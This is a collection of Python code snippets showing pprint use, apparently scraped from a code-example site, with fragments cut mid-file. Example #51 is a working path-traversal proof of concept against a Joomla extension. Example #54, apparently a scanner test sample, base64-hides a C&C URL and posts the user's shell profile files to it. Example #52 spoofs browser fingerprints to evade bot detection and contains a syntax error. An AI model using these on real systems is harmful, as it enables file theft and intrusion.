def parse_ingredient(string):
    ''' parses ingredient to structured dict '''
    tree = parser.parse(string)

    return IngredientTransformer().transform(tree)


if __name__ == "__main__":
    tree = parser.parse("10 jar sauce")
    print(tree)
    print(tree.pretty())
    tree = IngredientTransformer().transform(tree)
    pprint.pprint(tree)
Example #37
 def _print(self):
     print("\n==================Options=================")
     pprint(vars(self.opt), indent=4)
     print("==========================================\n")
Example #38
async def main():
    from pprint import pprint

    from bot.enums import OrderType

    exchange = Binance()
    exchange.set_market_type("linear_perpetual")
    exchange.use_test_net()
    await exchange.prepare()
    exchange.auth({
        "api_key": "",
        "secret": "",
    })

    pprint(exchange._ccxt_exchange.markets["ETH/USDT"]["precision"])

    position = await exchange.fetch_position(pair="ETHUSDT")
    print("Position:")
    pprint(position)

    current_orders = await exchange.fetch_current_orders(pair="ETHUSDT")
    print("\n")
    print("Current Orders:")
    pprint(current_orders)

    account = await exchange.fetch_total_balance("USDT")
    print("\n")
    print("Balance:")
    pprint(account)

    last_price = await exchange.fetch_last_price("ETHUSDT")
    print("\n")
    print("Last Price: ", last_price)

    order_book_ticker = await exchange.fetch_order_book_ticker("ETHUSDT")
    print("\n")
    print("Order Book Ticker:")
    pprint(order_book_ticker)

    candles = await exchange.fetch_candles("ETHUSDT", period="1m")
    print("\n")
    print("Candles:")
    print(len(candles))
    pprint(candles)

    await exchange.cancel_current_orders("ETHUSDT")
    await exchange.place_order(
        pair="ETHUSDT",
        order_type=OrderType.limit,
        side=-1,
        qty=0.001,
        price=500,
    )
    await exchange.place_order(
        pair="ETHUSDT",
        order_type=OrderType.limit,
        side=1,
        qty=0.001,
        price=100,
    )
    await exchange.place_order(
        pair="ETHUSDT",
        order_type=OrderType.trigger,
        side=1,
        qty=0.001,
        price=600,
    )

    await exchange.place_orders_batch([
        dict(
            pair="ETHUSDT",
            order_type=OrderType.limit,
            side=-1,
            qty=0.001,
            price=500,
        ),
        dict(
            pair="ETHUSDT",
            order_type=OrderType.limit,
            side=1,
            qty=0.001,
            price=100,
        ),
        dict(
            pair="ETHUSDT",
            order_type=OrderType.trigger,
            side=1,
            qty=0.001,
            price=500,
        ),
    ])

    await exchange.close()
Example #39
 def _inner(environ, start_fn):
     pprint.pprint(environ)
     return handler(environ, start_fn)
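
# The enclosing factory is not shown above; a minimal sketch of the WSGI
# middleware this _inner likely belongs to (an assumption, not the original
# code) could be:
import pprint

def log_environ(handler):
    def _inner(environ, start_fn):
        pprint.pprint(environ)              # dump the request environ for debugging
        return handler(environ, start_fn)
    return _inner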
Example #40
def Spirent_MAC_Transperancy_Traffic_Testing_For_EVPN_Service():
    Booked_ports, Interface_config, Stream_config, Spirent_Test_Infra, Stream_Name = get_spirent_data(
    )
    Number_of_ports = Spirent_Test_Infra['Number_of_ports']
    Number_of_streams_per_Port = Spirent_Test_Infra[
        'Number_of_streams_per_Port']
    Total_Number_of_stream = Spirent_Test_Infra['Total_Number_of_stream']
    Initial_MAC_address = Spirent_Test_Infra['Initial_MAC_address']

    ##############################################################
    # Creation of Spirent Test config with log file
    ##############################################################

    test_sta = sth.test_config(
        log='1',
        logfile='SteamConfig-WithPercentageTraffic_logfile',
        vendorlogfile='SteamConfig-WithPercentageTraffic_stcExport',
        vendorlog='1',
        hltlog='1',
        hltlogfile='SteamConfig-WithPercentageTraffic_hltExport',
        hlt2stcmappingfile='SteamConfig-WithPercentageTraffic_hlt2StcMapping',
        hlt2stcmapping='1',
        log_level='7')

    status = test_sta['status']
    if (status == '0'):
        print("run sth.test_config failed")

    ##############################################################
    # config the parameters for optimization and parsing
    ##############################################################

    test_ctrl_sta = sth.test_control(action='enable')

    status = test_ctrl_sta['status']
    if (status == '0'):
        print("run sth.test_control failed")

    ##############################################################
    # connect to chassis and reserve port list
    ##############################################################
    i = 0
    device = "10.91.113.124"
    port_list = list(Booked_ports.values())
    Streams = list(Stream_Name.values())
    port_handle = []
    intStatus = sth.connect(device=device,
                            port_list=port_list,
                            break_locks=1,
                            offline=0)

    status = intStatus['status']

    if (status == '1'):
        for port in port_list:
            port_handle.append(intStatus['port_handle'][device][port])
            i += 1
    else:
        print("\nFailed to retrieve port handle!\n")
    #		print(port_handle)
    print(port_handle)
    ##############################################################
    # Spirent Ports configuration
    ##############################################################
    for i in range(len(port_list)):
        int_ret0 = sth.interface_config(mode='config',
                                        port_handle=port_handle[i],
                                        create_host='false',
                                        intf_mode='ethernet',
                                        phy_mode='fiber',
                                        scheduling_mode='RATE_BASED',
                                        port_loadunit='PERCENT_LINE_RATE',
                                        port_load='50',
                                        enable_ping_response='0',
                                        control_plane_mtu='1500',
                                        flow_control='false',
                                        speed='ether1000',
                                        data_path_mode='normal',
                                        autonegotiation='1')
        status = int_ret0['status']
        if (status == '0'):
            print("run sth.interface_config failed")
    # print(int_ret0)
    ##############################################################
    # create traffic
    ##############################################################
    streamblock_ret1 = sth.traffic_config(
        mode='create',
        port_handle=port_handle[0],
        l2_encap='ethernet_ii',
        l3_protocol='ipv4',
        ip_id='0',
        ip_src_addr='192.85.1.2',
        ip_dst_addr='192.0.0.1',
        ip_ttl='255',
        ip_hdr_length='5',
        ip_protocol='253',
        ip_fragment_offset='0',
        ip_mbz='0',
        ip_precedence='0',
        ip_tos_field='0',
        mac_dst_mode='increment',
        mac_dst_repeat_count='0',
        mac_dst_count='50',
        mac_src_count='50',
        mac_src_mode='increment',
        mac_src_repeat_count='0',
        mac_src='00:10:94:00:00:02',
        mac_dst='00:00:01:00:00:01',
        enable_control_plane='0',
        l3_length='4982',
        name='StreamBlock_11',
        fill_type='constant',
        fcs_error='0',
        fill_value='0',
        frame_size='2000',
        traffic_state='1',
        high_speed_result_analysis='1',
        length_mode='fixed',
        dest_port_list=port_handle[1],
        tx_port_sending_traffic_to_self_en='false',
        disable_signature='0',
        enable_stream_only_gen='1',
        pkts_per_burst='1',
        inter_stream_gap_unit='bytes',
        burst_loop_count='6000',
        transmit_mode='continuous',
        inter_stream_gap='12',
        rate_mbps='800',
        mac_discovery_gw='192.85.1.1',
        enable_stream='false')

    status = streamblock_ret1['status']
    if (status == '0'):
        print("run sth.traffic_config failed")
        print(streamblock_ret1)
    else:
        print("***** run sth.traffic_config successfully")

    streamblock_ret2 = sth.traffic_config(
        mode='create',
        port_handle=port_handle[1],
        l2_encap='ethernet_ii',
        l3_protocol='ipv4',
        ip_id='0',
        ip_src_addr='192.85.1.2',
        ip_dst_addr='192.0.0.1',
        ip_ttl='255',
        ip_hdr_length='5',
        ip_protocol='253',
        ip_fragment_offset='0',
        ip_mbz='0',
        ip_precedence='0',
        ip_tos_field='0',
        mac_dst_mode='increment',
        mac_dst_repeat_count='0',
        mac_dst_count='50',
        mac_src_count='50',
        mac_src_mode='increment',
        mac_src_repeat_count='0',
        mac_src='00:00:01:00:00:01',
        mac_dst='00:10:94:00:00:02',
        enable_control_plane='0',
        l3_length='4982',
        name='StreamBlock_12',
        fill_type='constant',
        fcs_error='0',
        fill_value='0',
        frame_size='5000',
        traffic_state='1',
        high_speed_result_analysis='1',
        length_mode='fixed',
        dest_port_list=port_handle[0],
        tx_port_sending_traffic_to_self_en='false',
        disable_signature='0',
        enable_stream_only_gen='1',
        pkts_per_burst='1',
        inter_stream_gap_unit='bytes',
        burst_loop_count='6000',
        transmit_mode='continuous',
        inter_stream_gap='12',
        rate_mbps='800',
        mac_discovery_gw='192.85.1.1',
        enable_stream='false')

    status = streamblock_ret2['status']
    if (status == '0'):
        print("run sth.traffic_config failed")
        print(streamblock_ret2)
    else:
        print("***** run sth.traffic_config successfully")

    # config part is finished
    #############################################################
    # start traffic
    ##############################################################
    print("Traffic Started First Time")
    traffic_ctrl_ret = sth.traffic_control(
        port_handle=[port_handle[0], port_handle[1]],
        action='run',
        duration='30')
    time.sleep(60)
    print("After Aging Timer")
    traffic_ctrl_ret = sth.traffic_control(
        port_handle=[port_handle[0], port_handle[1]], action='clear_stats')
    print("Delay before Second Traffic Started Second Time")
    time.sleep(60)
    print("Traffic Started Second Time")
    traffic_ctrl_ret = sth.traffic_control(
        port_handle=[port_handle[0], port_handle[1]],
        action='run',
        duration='10')
    status = traffic_ctrl_ret['status']
    if (status == '0'):
        print("run sth.traffic_control failed")
    # print(traffic_ctrl_ret)
    print("Test Traffic Stopped now adding delay before collecting stats")
    time.sleep(70)
    print("Traffic collection started")
    ##############################################################
    # start to get the traffic results
    ##############################################################
    traffic_results_ret = sth.traffic_stats(
        port_handle=[port_handle[0], port_handle[1]], mode='all')
    print("Traffic collection stopped")
    status = traffic_results_ret['status']
    if (status == '0'):
        print("run sth.traffic_stats failed")
    pprint(traffic_results_ret)
    cleanup_sta = sth.cleanup_session(
        port_handle=[port_handle[0], port_handle[1]], clean_dbfile='1')
    print("Port Cleanedup")
    ##############################################################
    # Get required values from Stats
    ##############################################################

    traffic_result = str(traffic_results_ret)

    # regex to get rx, tx and streams from traffic_results_ret
    RX = '(streamblock\d+)\S+\s+\S+(rx)\S+\s+\S+total_pkt_bytes\S+\s+\S(\d+)'
    TX = '(streamblock\d+).*?(tx)\S+\s+\S+total_pkt_bytes\S+\s+\S(\d+)'

    StreamBlock = 'streamblock\d+'

    print('Spirent Ports= ' + str(port_list) + '\nTotal Ports= ' +
          str(len(port_list)))
    PortStatus = 'Spirent Ports= ' + str(port_list) + '\nTotal Ports= ' + str(
        len(port_list))
    StreamBlock = re.findall(StreamBlock, traffic_result)
    print('Stream Configured= ' + str(StreamBlock) + '\nTotal Streams= ' +
          str(len(StreamBlock)))
    StreamStatus = 'Stream Configured= ' + str(
        StreamBlock) + '\nTotal Streams= ' + str(len(StreamBlock))
    rx_stats = re.findall(RX, traffic_result)
    tx_stats = re.findall(TX, traffic_result)

    print('rx_stats= ' + str(rx_stats))
    print('tx_stats= ' + str(tx_stats))

    stats = 'rx_stats= ' + str(rx_stats) + '\ntx_stats= ' + str(tx_stats)

    StreamResult = []

    for i in range(0, len(StreamBlock)):
        if rx_stats[i][2] == tx_stats[i][2]:
            print(str(rx_stats[i][0] + ' = pass'))
            StreamResult.append('pass')

        else:
            print(str(rx_stats[i][0] + ' = fail'))
            StreamResult.append('fail')

    print(str(StreamResult))

    OverallStatus = '\n' + PortStatus + '\n' + StreamStatus + '\n' + stats + '\n' + str(
        StreamResult)
    # print(OverallStatus)

    return OverallStatus
Example #41
def test_rcnn_dota_quadrangle(cfg, dataset, image_set, root_path, dataset_path,
              ctx, prefix, epoch,
              vis, ignore_cache, shuffle, has_rpn, proposal, thresh, logger=None, output_path=None):
    if not logger:
        assert False, 'require a logger'

    # print cfg
    pprint.pprint(cfg)
    logger.info('testing cfg:{}\n'.format(pprint.pformat(cfg)))

    # load symbol and testing data
    if has_rpn:
        sym_instance = eval(cfg.symbol + '.' + cfg.symbol)()
        sym = sym_instance.get_symbol(cfg, is_train=False)
        imdb = eval(dataset)(image_set, root_path, dataset_path, result_path=output_path)
        roidb = imdb.gt_roidb()
    else:
        sym_instance = eval(cfg.symbol + '.' + cfg.symbol)()
        sym = sym_instance.get_symbol_rcnn(cfg, is_train=False)
        imdb = eval(dataset)(image_set, root_path, dataset_path, result_path=output_path)
        gt_roidb = imdb.gt_roidb()
        roidb = eval('imdb.' + proposal + '_roidb')(gt_roidb)

    if cfg.TEST.DO_MULTISCALE_TEST:
        print "multiscale test!"
        multiscales = np.array(cfg.TEST.MULTISCALE)
        original_scales = cfg.SCALES
        for scale in multiscales:
            print "scale: {}".format(scale)
            cfg.SCALES[0] = (int(original_scales[0][0] * scale), int(original_scales[0][1] * scale))
            # get test data iter
            test_data = QuadrangleTestLoader(roidb, cfg, batch_size=len(ctx), shuffle=shuffle, has_rpn=has_rpn)

            # load model
            arg_params, aux_params = load_param(prefix, epoch, process=True)

            # infer shape
            data_shape_dict = dict(test_data.provide_data_single)
            sym_instance.infer_shape(data_shape_dict)

            sym_instance.check_parameter_shapes(arg_params, aux_params, data_shape_dict, is_train=False)

            # decide maximum shape
            data_names = [k[0] for k in test_data.provide_data_single]
            label_names = None
            max_data_shape = [[('data', (1, 3, max([v[0] for v in cfg.SCALES]), max([v[1] for v in cfg.SCALES])))]]
            if not has_rpn:
                max_data_shape.append(('rois', (cfg.TEST.PROPOSAL_POST_NMS_TOP_N + 30, 5)))

            # create predictor
            predictor = Predictor(sym, data_names, label_names,
                                  context=ctx, max_data_shapes=max_data_shape,
                                  provide_data=test_data.provide_data, provide_label=test_data.provide_label,
                                  arg_params=arg_params, aux_params=aux_params)

            # start detection
            pred_eval_quadrangle_multiscale(scale, predictor, test_data, imdb, cfg, vis=vis, draw=True, ignore_cache=ignore_cache,
                                 thresh=thresh, logger=logger)
        # merge all different test scale results to one file
        merge_dets_to_one_file(imdb.result_path, multiscales)
        # do polygon nms then in evaluation script

    else:
        # get test data iter
        test_data = QuadrangleTestLoader(roidb, cfg, batch_size=len(ctx), shuffle=shuffle, has_rpn=has_rpn)

        # load model
        arg_params, aux_params = load_param(prefix, epoch, process=True)

        # infer shape
        data_shape_dict = dict(test_data.provide_data_single)
        sym_instance.infer_shape(data_shape_dict)

        sym_instance.check_parameter_shapes(arg_params, aux_params, data_shape_dict, is_train=False)

        # decide maximum shape
        data_names = [k[0] for k in test_data.provide_data_single]
        label_names = None
        max_data_shape = [[('data', (1, 3, max([v[0] for v in cfg.SCALES]), max([v[1] for v in cfg.SCALES])))]]
        if not has_rpn:
            max_data_shape.append(('rois', (cfg.TEST.PROPOSAL_POST_NMS_TOP_N + 30, 5)))

        # create predictor
        predictor = Predictor(sym, data_names, label_names,
                              context=ctx, max_data_shapes=max_data_shape,
                              provide_data=test_data.provide_data, provide_label=test_data.provide_label,
                              arg_params=arg_params, aux_params=aux_params)

        # start detection
        pred_eval_dota_quadrangle(predictor, test_data, imdb, cfg, vis=False, draw=False, ignore_cache=ignore_cache,
                             thresh=thresh, logger=logger)
Example #42
0
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        from pprint import pprint
        pprint('titleform init')
Example #43
0
            52500,
            "is_oem":
            True,
            "repair": {
                "repair_difficulty": 2,
                "repair_hours": 0.0,
                "labor_rate_per_hour": 106.38,
                "part_cost": 6.15,
                "labor_cost": 0.0,
                "misc_cost": 0.0,
                "total_cost": 6.15
            },
            "parts": [{
                "desc": "Engine Oil",
                "manufacturer": "",
                "price": "6.15",
                "qty": "1"
            }]
        }, {'a'}]
    }
    test_list = [
        'ira', 'nanna', 'ghost', [1, 2, 3], {'a', 'b', 'c'}, ('do', 're', 'mi')
    ]
    user_input = str(test_list)
    # print(user_input, l2test)
    # print(gen.__name__)
    pprint(json_ast(user_input))
    _grapher(graph, json_ast(user_input))
    if graph.write_png('dtree.png'):
        print("Graph made successfully.")
Example #44
0
    args = parser.parse_args()

    address = (args.host, args.p)
    protocol = lookup('PROTOCOL_', args.P)

    context = ssl.SSLContext(protocol)
    context.set_ciphers(args.C)
    context.check_hostname = False
    if (args.s is not None) and (args.c is not None):
        parser.error('you cannot specify both -c and -s')
    elif args.s is not None:
        context.verify_mode = ssl.CERT_OPTIONAL
        purpose = ssl.Purpose.CLIENT_AUTH
        context.load_cert_chain(args.s)
    else:
        context.verify_mode = ssl.CERT_REQUIRED
        purpose = ssl.Purpose.SERVER_AUTH
        if args.c is not None:
            context.load_cert_chain(args.c)
    if args.a is None:
        context.load_default_certs(purpose)
    else:
        context.load_verify_locations(args.a)

    print()
    ssl_sock = open_tls(context, address, args.s)
    cert = describe(ssl_sock, args.host, args.s, args.d)
    print()
    if args.v:
        pprint(cert)
Example #45
0
def trainval(exp_dict, savedir_base, datadir, reset=False, metrics_flag=True):
    # bookkeeping
    # ---------------

    # get experiment directory
    exp_id = hu.hash_dict(exp_dict)
    savedir = os.path.join(savedir_base, exp_id)

    if reset:
        # delete and backup experiment
        hc.delete_experiment(savedir, backup_flag=True)
    
    # create folder and save the experiment dictionary
    os.makedirs(savedir, exist_ok=True)
    hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
    pprint.pprint(exp_dict)
    print('Experiment saved in %s' % savedir)
    
    # set seed
    # ---------------
    seed = 42 + exp_dict['runs']
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)

    # Dataset
    # -----------

    # Load Train Dataset
    train_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
                                     train_flag=True,
                                     datadir=datadir,
                                     exp_dict=exp_dict)

    train_loader = torch.utils.data.DataLoader(train_set,
                              drop_last=True,
                              shuffle=True,
                              batch_size=exp_dict["batch_size"])

    # Load Val Dataset
    val_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
                                   train_flag=False,
                                   datadir=datadir,
                                   exp_dict=exp_dict)


    # Model
    # -----------
    model = models.get_model(exp_dict["model"],
                             train_set=train_set).cuda()
    # Choose loss and metric function
    loss_function = metrics.get_metric_function(exp_dict["loss_func"])

    # Load Optimizer
    n_batches_per_epoch = len(train_set)/float(exp_dict["batch_size"])
    opt = optimizers.get_optimizer(opt=exp_dict["opt"],
                                   params=model.parameters(),
                                   n_batches_per_epoch =n_batches_per_epoch)

    # Checkpoint
    # -----------
    model_path = os.path.join(savedir, 'model.pth')
    score_list_path = os.path.join(savedir, 'score_list.pkl')
    opt_path = os.path.join(savedir, 'opt_state_dict.pth')

    if os.path.exists(score_list_path):
        # resume experiment
        score_list = hu.load_pkl(score_list_path)
        model.load_state_dict(torch.load(model_path))
        opt.load_state_dict(torch.load(opt_path))
        s_epoch = score_list[-1]['epoch'] + 1
    else:
        # restart experiment
        score_list = []
        s_epoch = 0

    # Train & Val
    # ------------
    print('Starting experiment at epoch %d/%d' % (s_epoch, exp_dict['max_epoch']))

    for epoch in range(s_epoch, exp_dict['max_epoch']):
        # Set seed
        np.random.seed(exp_dict['runs']+epoch)
        torch.manual_seed(exp_dict['runs']+epoch)
        torch.cuda.manual_seed_all(exp_dict['runs']+epoch)

        score_dict = {"epoch": epoch}

        if metrics_flag:
            # 1. Compute train loss over train set
            score_dict["train_loss"] = metrics.compute_metric_on_dataset(model, train_set,
                                                metric_name=exp_dict["loss_func"])

            # 2. Compute val acc over val set
            score_dict["val_acc"] = metrics.compute_metric_on_dataset(model, val_set,
                                                        metric_name=exp_dict["acc_func"])

        # 3. Train over train loader
        model.train()
        print("%d - Training model with %s..." % (epoch, exp_dict["loss_func"]))

        s_time = time.time()
        for images,labels in tqdm.tqdm(train_loader):
            images, labels = images.cuda(), labels.cuda()

            opt.zero_grad()

            if exp_dict["opt"]["name"] in exp_configs.ours_opt_list + ["l4"]:
                closure = lambda backwards: loss_function(model, images, labels, backwards=backwards)
                opt.step(closure)

            else:
                loss = loss_function(model, images, labels)
                loss.backward()
                opt.step()

        e_time = time.time()

        # Record metrics
        score_dict["step_size"] = opt.state["step_size"]
        score_dict["n_forwards"] = opt.state["n_forwards"]
        score_dict["n_backwards"] = opt.state["n_backwards"]
        score_dict["batch_size"] =  train_loader.batch_size
        score_dict["train_epoch_time"] = e_time - s_time

        score_list += [score_dict]

        # Report and save
        print(pd.DataFrame(score_list).tail())
        hu.save_pkl(score_list_path, score_list)
        hu.torch_save(model_path, model.state_dict())
        hu.torch_save(opt_path, opt.state_dict())
        print("Saved: %s" % savedir)

    print('Experiment completed')
Example #46
0
    save_player("Dr.WeeD", "4242")
    save_player("Dr.WeeD2", "4242")
    save_player("Dr.WeeD3", "4242")
    save_player("Dr.WeeD4", "4242")
    save_player("Dr.WeeD5", "4242")
    save_player("Dr.WeeD6", "4242")
    save_player("test", "76561197984877751")
    save_start_player_session("4242", datetime.datetime.now().timestamp())
    save_end_player_session(
        "4242",
        int(
            (datetime.datetime.now() + datetime.timedelta(minutes=30)).timestamp()
            * 1000
        ),
    )
    save_end_player_session(
        "4242",
        int(
            (datetime.datetime.now() + datetime.timedelta(minutes=30)).timestamp()
            * 1000
        ),
    )
    add_player_to_blacklist("4242", "test")
    remove_player_from_blacklist("4242")

    import pprint

    pprint.pprint(get_players_by_appearance())

    add_flag_to_player("76561198156263725", "🐷")
Example #47
0
# Add a Data Center
datacenter_added = oneview_client.datacenters.add(datacenter_information)
print('Added Data Center {name} successfully\n'.format(**datacenter_added))

# Retrieve Data Center by URI
datacenter = oneview_client.datacenters.get(datacenter_added['uri'])
print('Get Data Center by URI: retrieved {name} successfully\n'.format(**datacenter))

# Update the Data Center
datacenter['name'] = "New Data Center Name"
datacenter = oneview_client.datacenters.update(datacenter)
print('Data Center {name} updated successfully\n'.format(**datacenter))

# Get the Data Center by name
datacenter_list = oneview_client.datacenters.get_by('name', "New Data Center Name")
print('Get Data Center device by name: {name}\n'.format(**datacenter))

# Get the Data Center visual content
print("Getting the Data Center visual content...")
datacenter_visual_content = oneview_client.datacenters.get_visual_content(datacenter['uri'])
pprint(datacenter_visual_content)

# Remove added Data Center
oneview_client.datacenters.remove(datacenter)
print("\nSuccessfully removed the data center")

# Add a data center again and call Remove All
datacenter_added = oneview_client.datacenters.add(datacenter_information)
oneview_client.datacenters.remove_all(filter="name matches '%'")
print("\nSuccessfully removed all data centers")
Example #48
0
    def _dump_state(self):
        print('---- type variables ----')
        pprint([v for k, v in sorted(self.typeinfer.typevars.items())])
Example #49
0
            }

        retDict = {
            'content': res,
            'links': {},
            "response_status": res.status_code,
        }
        # Find and follow all the links
        links = regexes.RE_LINK.findall(res.text)
        linksSet = self.get_valid_links(links)

        # for links up to maxLinks, crawl recursively
        for link in linksSet:
            # Get the absolute URL
            link = urllib.parse.urljoin(url, link)
            retDict['links'][link] = self._crawl_wrapper(
                link, maxLevel - 1, **kwargs)

        return retDict


class URLOnlyCrawler(linkvalidators.URLOnlyValidator, BaseCrawler):
    """Only crawls URL and not inside files, etc."""

    pass


if __name__ == '__main__':
    url = sys.argv[1:2][0]
    pprint(BaseCrawler().crawl(url, 2))
Example #50
0
           'platform': 'vIOS'}

access4 = {'hostname': 'Access4',
           'interfaces': {'gig0/0': {'allowed_vlans': '1,10,20,30,40,50,60,70',
                                     'encapsulation': 'dot1q',
                                     'mode': 'trunk',
                                     'state': 'no shutdown'},
                          'gig0/1': {'allowed_vlans': '1,10,20,30,40,50,60,70',
                                     'encapsulation': 'dot1q',
                                     'mode': 'trunk',
                                     'state': 'no shutdown'},
                          'gig0/3': {'mode': 'access',
                                     'state': 'no shutdown',
                                     'vlan': 30}},
           'layer': 'access',
           'mgmt_intf': 'vlan 10',
           'mgmt_ip': '10.10.0.8',
           'mgmt_subnet': '255.255.255.0',
           'platform': 'vIOS'}

all_devices = [core1, core2, distro1, distro2, access1, access2, access3, access4]

core = [core1, core2]

distro = [distro1, distro2]

access = [access1, access2, access3, access4]

for device in all_devices:
    pprint(device)
Example #51
0
                    file=[../../index.php] The file parameter is not properly filtered, allowing arbitrary files to be downloaded
                    ''',
            'references': [
                'https://www.bugscan.net/#!/x/22738',
            ],
        },
    }

    @classmethod
    def verify(cls, args):
        verify_url = args['options'][
            'target'] + "/index.php?option=com_jetext&task=download&file=../../index.php"
        if args['options']['verbose']:
            print '[*] Request URL: ' + verify_url
        request = urllib2.Request(verify_url)
        response = urllib2.urlopen(request)
        content = response.read()
        if 'Id: index.php' in content:
            args['success'] = True
            args['poc_ret']['vul_url'] = verify_url
        return args

    exploit = verify


if __name__ == "__main__":
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())
Example #52
0
    # Give webdriver.Chrome a method named add_script
    webdriver.Chrome.add_script = add_script  # this (webdriver.Chrome) may need to change when a different driver is used
    # *************** professional fakery ###################

    browser = webdriver.Chrome(
        executable_path=driver_path,
        chrome_options=options
    )

    # ################## debugging aid *********************
    existed = {
        'executor_url': browser.command_executor._url,  # address for remotely attaching to the browser
        'session_id': browser.session_id  # browser session ID
    }
    }
    pprint(existed)
    with open('existed.json', 'wt', encoding='utf-8') as f:
        json.dump(existed, f, ensure_ascii=False, indent=4)
    # ********************* debugging aid ##################

    # ############### professional fakery ***************************
    browser.add_script("""
    Object.defineProperty(navigator, 'webdriver', {
        get: () => false,
    });
    window.navigator.chrome = {
        runtime: {},
    };
    Object.defineProperty(navigator, 'languages', {
        get: () => ['zh-CN', 'zh']
    });
Example #53
0
    all_deployments = []
    response = apiGatewayClient.get_rest_apis()
    deployments = map(lambda i: get_deployments_for_api(i['id']),
                      response['items'])
    for d in deployments:
        all_deployments.extend(d)
    return all_deployments

def get_deployments_for_api(restApiId):
    response = apiGatewayClient.get_deployments(restApiId=restApiId)
    return response['items']

response = apiGatewayClient.get_rest_apis()
print('Existing deployments:')
for deployment in get_deployments():
    pprint.pprint(deployment)

instances = []
response = ec2Client.describe_instances()
print('Existing instances:')
for reservation in response['Reservations']:
    for instance in reservation['Instances']:
        instances.append(instance)

for i in instances:
    pprint.pprint(i)

myInstances = ec2Resource.instances.all()
for instance in myInstances:
    pprint.pprint(instance)
Example #54
0
from .. import relative

from requests import post  # Import only function from a module
# Simple obfuscation of URL
url = 'aHR0cDovL21hbHd' + 'hcmUuY29tL0NuQw==\n'

blah = open  # Rename builtin function

d = {
    'func': blah
}

somefile = d['func']('~/.profile')

payload = somefile.read()

test_url = "https://example.com/index.html"

with blah('~/.bash_rc') as fd:
    # Local context sensitive
    post(url.decode('base64'), body=fd.read())

# This statement works only in Python 2; can't be parsed in Python 3
print "test"

cpx = 12 + 3j # complex number

fabulous.pprint("adalaraoawa aoalalaeaH"[::-2])  # String "Hello world" after slicing

eval("print('$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!')")
with open('hyperparams/{}.yml'.format(args.algo), 'r') as f:
    hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader)[BASE_ENV]

hyperparams['seed'] = args.seed
# Sort hyperparams that will be saved
saved_hyperparams = OrderedDict([(key, hyperparams[key])
                                 for key in sorted(hyperparams.keys())])
# save vae path
saved_hyperparams['vae_path'] = args.vae_path
if vae is not None:
    saved_hyperparams['z_size'] = vae.z_size

# Save simulation params
for key in SIM_PARAMS:
    saved_hyperparams[key] = eval(key)
pprint(saved_hyperparams)

# Compute and create log path
log_path = os.path.join(args.log_folder, args.algo)
save_path = os.path.join(
    log_path, "{}_{}".format(ENV_ID,
                             get_latest_run_id(log_path, ENV_ID) + 1))
params_path = os.path.join(save_path, ENV_ID)
os.makedirs(params_path, exist_ok=True)

# Create learning rate schedules for ppo2 and sac
if args.algo in ["ppo2", "sac", 'sac2']:
    for key in ['learning_rate', 'cliprange']:
        if key not in hyperparams:
            continue
        if isinstance(hyperparams[key], str):
Example #56
0
def metrics(clusters,
            thresh,
            t_ref,
            t_cen,
            t_exp,
            ignore=[0],
            estimates='roct'):
    ''' This function runs all the metrics calculations and sums them
    
    Parameters
    -----------------------------------------
    clusters : A dictionary of the clusters.  The keys are the cluster
        numbers.  The values are numpy structured arrays with fields
        'times', 'waveforms', and 'pca' which give the timestamp,
        tetrode waveform, and pca reduced values, respectively, for each
        spike in the cluster.  Get this from load_spikes() or from 
        ePhys.Sorter.clusters.
    thresh : detection threshold used for spike sorting
    t_ref : the width of the refractory period, in seconds
    t_cen : the width of the censored period, in seconds
    t_exp : the total length of the experiment, in seconds
    ignore : a list of the clusters to ignore in the analysis.  Default is cluster
        zero since that is typically the noise cluster.
    estimates : a string of estimates to include
        'r' for refractory
        'o' for overlap
        'c' for censored
        't' for thresholding
        So 'roct' does them all, 'ro' only does refractory and overlap,
            'ct' does censored and thresholding, and so on.
    
    Returns
    -----------------------------------------
    f_p : dictionary of false positive estimates for each cluster
        if an estimate can't be made, will be NaN.  This means that the 
        estimate is >50%
    f_n : dictionary of false negative estimates for each cluster
    
    '''
    import pprint as pp  # Pretty print!
    from collections import defaultdict
    all_estimates = 'roct'
    false_pos_est = {est: defaultdict(int) for est in all_estimates}
    false_neg_est = {est: defaultdict(int) for est in all_estimates}

    if 'r' in estimates:
        f_p_r = refractory(clusters, t_ref, t_cen, t_exp)
        print "Refractory violation false positive estimate:"
        pp.pprint(f_p_r)
        false_pos_est.update({'r': f_p_r})
    if 't' in estimates:
        f_n_t = threshold(clusters, thresh)
        print "Thresholding false negatives estimate:"
        pp.pprint(f_n_t)
        false_neg_est.update({'t': f_n_t})
    if 'o' in estimates:
        f_p_o, f_n_o = overlap(clusters, ignore)
        print "Overlap false positives and negatives estimate:"
        pp.pprint(f_p_o)
        pp.pprint(f_n_o)
        false_pos_est.update({'o': f_p_o})
        false_neg_est.update({'o': f_n_o})
    if 'c' in estimates:
        f_n_c = censored(clusters, t_cen, t_exp)
        print "Censored false negatives estimate:"
        pp.pprint(f_n_c)
        false_neg_est.update({'c': f_n_c})

    f_p = dict.fromkeys(clusters.keys())
    f_n = dict.fromkeys(clusters.keys())
    for cid in clusters.iterkeys():
        if np.isnan(false_pos_est['r'][cid]):
            f_p[cid] = np.nan
        else:
            f_p[cid] = np.sum([false_pos_est[est][cid] for est in estimates])

        if false_neg_est['o'][cid] == None:
            f_n[cid] = np.nan
        else:
            f_n[cid] = np.sum([false_neg_est[est][cid] for est in estimates])

    print "Summing everything up"
    return f_p, f_n
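
# A minimal usage sketch, assuming `clusters` is built as numpy structured arrays
# matching the docstring above; the threshold and time values are hypothetical, and
# refractory()/threshold()/overlap()/censored() must be defined elsewhere in this
# module, so the call itself is left commented out.
if __name__ == "__main__":
    import numpy as np
    spike_dtype = [('times', 'f8'), ('waveforms', 'f8', (4, 32)), ('pca', 'f8', (3,))]
    demo_clusters = {0: np.zeros(10, dtype=spike_dtype),   # cluster 0: typically noise
                     1: np.zeros(25, dtype=spike_dtype)}
    # f_p, f_n = metrics(demo_clusters, thresh=-4.0, t_ref=0.002, t_cen=0.001,
    #                    t_exp=3600.0, estimates='rt')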
Example #57
0
    <snipped for brevity>
    ...
    ('Internet  10.220.88.1           135   0062.ec29.70fe  ARPA   FastEthernet4\n'
